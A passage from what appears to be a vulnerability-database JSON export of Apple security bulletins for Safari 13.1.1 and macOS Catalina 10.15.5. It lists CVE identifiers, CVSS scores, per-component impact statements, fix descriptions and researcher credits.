"HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-26T00:00:00", "type": "apple", "title": "About the security content of Safari 13.1.1", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20503", "CVE-2020-9800", "CVE-2020-9801", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-05-26T00:00:00", "id": "APPLE:2D778DC3A51D07FD2EE75D0D87598CAB", "href": "https://support.apple.com/kb/HT211177", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:43:20", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra\n\nReleased May 26, 2020\n\n**Accounts**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**Accounts**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9772: Allison Husain of UC Berkeley\n\n**AirDrop**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9826: Dor Hadad of Palo Alto Networks\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**AppleUSBNetworking**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Inserting a USB device that sends invalid messages may cause a kernel panic\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9804: Andy Davis of NCC Group\n\n**Audio**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9831: Yu Wang of Didi Research America\n\n**Bluetooth**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9779: Yu Wang of Didi Research America\n\nEntry added September 21, 2020\n\n**Calendar**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Importing a maliciously crafted calendar invitation may exfiltrate user information\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-3882: Andy Grant of NCC Group\n\n**CoreBluetooth**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6\n\nImpact: A remote attacker may be able to leak sensitive user information\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9828: Jianjun Dai of Qihoo 360 Alpha Lab\n\n**CVMS**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-9856: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**DiskArbitration**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9847: Zhuo Liang of Qihoo 360 Vulcan Team working with 360 BugCloud (bugcloud.360.cn)\n\n**Find My**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2020-9855: Zhongcheng Li(CK01) of Topsec Alpha Team\n\n**FontParser**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9822: ABC Research s.r.o\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9796: ABC Research s.r.o.\n\nEntry added July 28, 2020\n\n**IPSec**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9837: Thijs Alkemade of Computest\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**ksh**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A local user may be able to execute arbitrary shell commands\n\nDescription: An issue existed in the handling of environment variables. This issue was addressed with improved validation.\n\nCVE-2019-14868\n\n**libxpc**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**NSURL**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: A malicious website may be able to exfiltrate autofilled data in Safari\n\nDescription: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.\n\nCVE-2020-9857: Dlive of Tencent Security Xuanwu Lab\n\n**PackageKit**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A permissions issue existed. This issue was addressed with improved permission validation.\n\nCVE-2020-9817: Andy Grant of NCC Group\n\n**PackageKit**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: An access issue was addressed with improved access restrictions.\n\nCVE-2020-9851: an anonymous researcher, Linus Henze (pinauten.de)\n\nEntry updated July 15, 2020\n\n**Python**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-9793\n\n**rsync**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to overwrite existing files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2014-9512: gaojianfeng\n\nEntry added July 28, 2020\n\n**Sandbox**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to bypass Privacy preferences\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2020-9825: Sreejith Krishnan R (@skr0x1C0)\n\n**Sandbox**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: A user may gain access to protected parts of the file system\n\nDescription: This issue was addressed with a new entitlement.\n\nCVE-2020-9771: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**Security**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A file may be incorrectly rendered to execute JavaScript\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9788: Wojciech Regu\u0142a of SecuRing (wojciechregula.blog)\n\nEntry updated July 15, 2020\n\n**Security**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2020-9854: Ilias Morad (A2nkF)\n\nEntry added July 28, 2020\n\n**SIP**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A non-privileged user may be able to modify restricted network settings\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9824: @jamestraynor, Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry updated June 10, 2020\n\n**Software Update**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A person with physical access to a Mac may be able to bypass Login Window\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9810: Francis @francisschmaltz\n\nEntry added July 15, 2020\n\n**SQLite**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may cause a denial of service or potentially disclose memory contents\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9794\n\n**System Preferences**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9839: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**USB Audio**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A USB device may be able to cause a denial of service\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2020-9792: Andy Davis of NCC Group\n\n**Wi-Fi**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: A double free issue was addressed with improved memory management.\n\nCVE-2020-9844: Ian Beer of Google Project Zero\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9830: Tielei Wang of Pangu Lab\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2020-9834: Yu Wang of Didi Research America\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2020-9833: Yu Wang of Didi Research America\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9832: Yu Wang of Didi Research America\n\n**WindowServer**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2020-9841: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**zsh**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2019-20044: Sam Foxman\n\n\n\n## Additional recognition\n\n**CoreBluetooth**\n\nWe would like to acknowledge Maximilian von Tschirschnitz (@maxinfosec1) of Technical University Munich and Ludwig Peuckert of Technical University Munich for their assistance.\n\n**CoreText**\n\nWe would like to acknowledge Jiska Classen (@naehrdine) and Dennis Heinze (@ttdennis) of Secure Mobile Networking Lab for their assistance.\n\n**Endpoint Security**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**ImageIO**\n\n****We would like to acknowledge Lei Sun for their assistance.\n\n**IOHIDFamily**\n\nWe would like to acknowledge Andy Davis of NCC Group for their assistance.\n\n**IPSec**\n\nWe would like to acknowledge Thijs Alkemade of Computest for their assistance.\n\n**Login Window**\n\nWe would like to acknowledge Jon Morby and an anonymous researcher for their assistance.\n\n**Sandbox**\n\nWe would like to acknowledge Jason L Lang of Optum for their assistance.\n\n**Spotlight**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-21T04:32:17", "title": "About the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9822", "CVE-2020-9827", "CVE-2020-9817", "CVE-2014-9512", "CVE-2020-9857", "CVE-2020-9771", "CVE-2020-9792", "CVE-2020-9772", "CVE-2020-9779", "CVE-2020-9828", "CVE-2020-9856", "CVE-2020-9837", "CVE-2020-9791", "CVE-2020-9824", "CVE-2020-9844", "CVE-2020-9832", "CVE-2020-9852", "CVE-2020-9854", "CVE-2020-9834", "CVE-2019-14868", "CVE-2020-3882", "CVE-2020-9826", "CVE-2020-9812", "CVE-2020-3878", "CVE-2020-9839", "CVE-2020-9804", "CVE-2020-9795", "CVE-2020-9831", "CVE-2020-9813", "CVE-2020-9821", "CVE-2020-9788", "CVE-2020-9809", "CVE-2020-9842", "CVE-2020-9796", "CVE-2020-9815", "CVE-2020-9790", "CVE-2020-9855", "CVE-2020-9830", "CVE-2020-9841", "CVE-2020-9833", "CVE-2020-9825", "CVE-2020-9810", "CVE-2020-9808", "CVE-2020-9851", "CVE-2020-9811", "CVE-2020-9793", "CVE-2019-20044", "CVE-2020-9814", "CVE-2020-9816", "CVE-2020-9789", "CVE-2020-9797", "CVE-2020-9847", "CVE-2020-9794", "CVE-2020-9994"], "modified": "2020-09-21T04:32:17", "id": "APPLE:HT211170", "href": "https://support.apple.com/kb/HT211170", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T22:12:10", "description": "# About the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra\n\nThis document describes the security content of macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra\n\nReleased May 26, 2020\n\n**Accounts**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9827: Jannik Lorenz of SEEMOO @ TU Darmstadt\n\n**Accounts**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9772: Allison Husain of UC Berkeley\n\n**AirDrop**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved input validation.\n\nCVE-2020-9826: Dor Hadad of Palo Alto Networks\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A malicious application could interact with system processes to access private information and perform privileged actions\n\nDescription: An entitlement parsing issue was addressed with improved parsing.\n\nCVE-2020-9842: Linus Henze (pinauten.de)\n\n**AppleUSBNetworking**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Inserting a USB device that sends invalid messages may cause a kernel panic\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2020-9804: Andy Davis of NCC Group\n\n**Audio**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9815: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Audio**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9791: Yu Zhou (@yuzhou6666) working with Trend Micro Zero Day Initiative\n\n**Bluetooth**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9831: Yu Wang of Didi Research America\n\n**Bluetooth**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9779: Yu Wang of Didi Research America\n\nEntry added September 21, 2020\n\n**Calendar**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Importing a maliciously crafted calendar invitation may exfiltrate user information\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-3882: Andy Grant of NCC Group\n\n**CoreBluetooth**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6\n\nImpact: A remote attacker may be able to leak sensitive user information\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-9828: Jianjun Dai of Qihoo 360 Alpha Lab\n\n**CVMS**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2020-9856: @jinmo123, @setuid0x0_, and @insu_yun_en of @SSLab_Gatech working with Trend Micro\u2019s Zero Day Initiative\n\n**DiskArbitration**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9847: Zhuo Liang of Qihoo 360 Vulcan Team working with 360 BugCloud (bugcloud.360.cn)\n\n**Find My**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2020-9855: Zhongcheng Li(CK01) of Topsec Alpha Team\n\n**FontParser**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9816: Peter Nguyen Vu Hoang of STAR Labs working with Trend Micro Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-3878: Samuel Gro\u00df of Google Project Zero\n\n**ImageIO**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9789: Wenchao Li of VARAS@IIE\n\nCVE-2020-9790: Xingwei Lin of Ant-financial Light-Year Security Lab\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-9822: ABC Research s.r.o\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved state handling.\n\nCVE-2020-9796: ABC Research s.r.o.\n\nEntry added July 28, 2020\n\n**IPSec**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A remote attacker may be able to leak memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2020-9837: Thijs Alkemade of Computest\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9821: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine another application's memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2020-9797: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed with improved input validation.\n\nCVE-2020-9852: Tao Huang and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2020-9795: Zhuo Liang of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: An application may be able to cause unexpected system termination or write kernel memory\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2020-9808: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.4\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9811: Tielei Wang of Pangu Lab\n\nCVE-2020-9812: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A logic issue existed resulting in memory corruption. This was addressed with improved state management.\n\nCVE-2020-9813: Xinru Chi of Pangu Lab\n\nCVE-2020-9814: Xinru Chi and Tielei Wang of Pangu Lab\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed with improved state management.\n\nCVE-2020-9809: Benjamin Randazzo (@____benjamin)\n\n**ksh**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A local user may be able to execute arbitrary shell commands\n\nDescription: An issue existed in the handling of environment variables. This issue was addressed with improved validation.\n\nCVE-2019-14868\n\n**libxpc**\n\nAvailable for: macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to overwrite arbitrary files\n\nDescription: A path handling issue was addressed with improved validation.\n\nCVE-2020-9994: Apple\n\nEntry added September 21, 2020\n\n**NSURL**\n\nAvailable for: macOS Mojave 10.14.6\n\nImpact: A malicious website may be able to exfiltrate autofilled data in Safari\n\nDescription: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.\n\nCVE-2020-9857: Dlive of Tencent Security Xuanwu Lab\n\n**PackageKit**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14.6, macOS Catalina 10.15.4\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A permissions issue existed. This issue was addressed with improved 